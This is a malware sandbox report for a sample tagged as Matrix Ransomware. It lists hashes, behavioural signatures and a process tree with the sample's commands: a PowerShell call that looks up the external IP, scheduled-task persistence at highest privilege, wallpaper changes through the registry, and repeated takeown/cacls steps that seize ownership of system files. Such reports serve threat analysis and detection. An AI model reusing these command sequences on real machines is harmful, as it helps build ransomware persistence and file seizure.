Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
94s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
28/12/2022, 18:35 UTC
General
-
Target
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
-
Size
1.2MB
-
MD5
c50c17057fc6ea67bc579196f1f73712
-
SHA1
44495db58fa7c94db840a3f696c8f546a5fce2d1
-
SHA256
67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a
-
SHA512
7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa
-
SSDEEP
24576:pxsxl/OOeI7RC4CJR5ez+IlnRJE5rABxPJhPPT/q:8fjRERAhPPzq
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
1
$webclient = new-object -typename system.net.webclient
2
$webclient.downloadstring("http://myexternalip.com/raw")
3
URLs
ps1.dropper
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
UPX packed file 64 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 27 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe"C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe" "C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe"C:\Users\Admin\AppData\Local\Temp\NWujmQJJ.exe" -n2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\JjDeQHEq.txt"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\zLzXyvi4.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\YnGIlPbI.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\YnGIlPbI.bmp" /f3⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Vx3ThnGc.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Vx3ThnGc.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Ct7Xyoqg.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Ct7Xyoqg.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC764.exehbFC3HC7.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Sets service image path in registry
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "store.db" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "classes.jsa" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "classes.jsa" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wab.exe" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "BrowserCore.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "BrowserCore.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "manifest.json" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wabmig.exe" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
